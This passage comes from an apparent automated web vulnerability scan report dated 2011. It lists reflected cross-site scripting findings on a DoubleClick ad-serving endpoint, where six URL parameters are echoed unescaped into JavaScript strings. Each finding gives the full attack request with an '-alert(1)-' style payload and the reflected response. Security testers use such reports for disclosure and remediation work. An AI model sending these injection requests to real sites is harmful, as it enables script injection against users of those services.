Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:26:35 GMT
Expires: Sun, 13 Feb 2011 14:31:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6817

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=835225148428'-alert(1)-'fed52c6ac08&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B0-0%3B0%3B59899979%3B4307-300/2
...[SNIP]...

3.3. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b98ec"-alert(1)-"62ba54f3bd was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587b98ec"-alert(1)-"62ba54f3bd&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:26:57 GMT
Expires: Sun, 13 Feb 2011 14:31:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6819

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
r minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587b98ec"-alert(1)-"62ba54f3bd&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/p%3B236295977%3B1-0%3B0%3B59899979%3B4307-300/250%3B40646337/40664124/1%3B%3B%7Eokv%
...[SNIP]...

3.4. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b5b7'-alert(1)-'04c437fc2f1 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=5394925876b5b7'-alert(1)-'04c437fc2f1&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:01 GMT
Expires: Sun, 13 Feb 2011 14:32:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6823

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=5394925876b5b7'-alert(1)-'04c437fc2f1&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B1-0%3B0%3B59899979%3B4307-300/250%3B40646337/40664124/1%3B%3B%7Eokv%
...[SNIP]...

3.5. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eda53"-alert(1)-"b388e110ca7 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4eda53"-alert(1)-"b388e110ca7&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:14 GMT
Expires: Sun, 13 Feb 2011 14:32:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6817

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4eda53"-alert(1)-"b388e110ca7&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B0-0%3B0%3B59899979%3B4307-300/250%3B40646325/40664112/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/
...[SNIP]...

3.6. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5370'-alert(1)-'f149e1c7fce was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4d5370'-alert(1)-'f149e1c7fce&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:18 GMT
Expires: Sun, 13 Feb 2011 14:32:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6817

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
get=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4d5370'-alert(1)-'f149e1c7fce&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B0-0%3B0%3B59899979%3B4307-300/250%3B40646325/40664112/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/
...[SNIP]...

3.7. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e71d7"-alert(1)-"969407df5f4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3e71d7"-alert(1)-"969407df5f4&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:06 GMT
Expires: Sun, 13 Feb 2011 14:32:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6817

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3e71d7"-alert(1)-"969407df5f4&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B0-0%3B0%3B59899979%3B4307-300/250%3B40646325/40664112/1%3B%3B%7Eokv%3D%3Bpc%3D
...[SNIP]...

3.8. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfdbc'-alert(1)-'14998d503d4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3dfdbc'-alert(1)-'14998d503d4&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:10 GMT
Expires: Sun, 13 Feb 2011 14:32:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6823

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3dfdbc'-alert(1)-'14998d503d4&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B1-0%3B0%3B59899979%3B4307-300/250%3B40646337/40664124/1%3B%3B%7Eokv%3D%3Bpc%3D
...[SNIP]...

3.9. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8eedb'-alert(1)-'9964a395251 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=310572708eedb'-alert(1)-'9964a395251&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:26:53 GMT
Expires: Sun, 13 Feb 2011 14:31:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6817

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=310572708eedb'-alert(1)-'9964a395251&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B0-0%3B0%3B59899979%3B4307-300/250%3B40646325/40664112/1
...[SNIP]...

3.10. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e38"-alert(1)-"980b05bcf00 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270b9e38"-alert(1)-"980b05bcf00&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:26:49 GMT
Expires: Sun, 13 Feb 2011 14:31:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6823

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
bkup.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270b9e38"-alert(1)-"980b05bcf00&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B1-0%3B0%3B59899979%3B4307-300/250%3B40646337/40664124/1
...[SNIP]...

3.11. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ef6e'-alert(1)-'ab9faab629d was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G5ef6e'-alert(1)-'ab9faab629d&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:26:44 GMT
Expires: Sun, 13 Feb 2011 14:31:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6817

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G5ef6e'-alert(1)-'ab9faab629d&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B0-0%3B0%3B59899979%3B4307-300/250%3B4
...[SNIP]...

3.12. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bca85"-alert(1)-"a281eeef130 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=Gbca85"-alert(1)-"a281eeef130&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:26:39 GMT
Expires: Sun, 13 Feb 2011 14:31:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6823

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
_SnackBar_300x250_bkup.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=Gbca85"-alert(1)-"a281eeef130&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B1-0%3B0%3B59899979%3B4307-300/250%3B4
...[SNIP]...

3.13. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10d24'-alert(1)-'8fc18c4834c was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=10d24'-alert(1)-'8fc18c4834c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6817
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:27:27 GMT
Expires: Sun, 13 Feb 2011 14:32:27 GMT

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=10d24'-alert(1)-'8fc18c4834chttp://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B0-0%3B0%3B59899979%3B4307-300/250%3B40646325/40664112/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://slim-fast.co
...[SNIP]...

3.14. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c34c1"-alert(1)-"ffec0e07b85 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=c34c1"-alert(1)-"ffec0e07b85 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6817
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:27:23 GMT
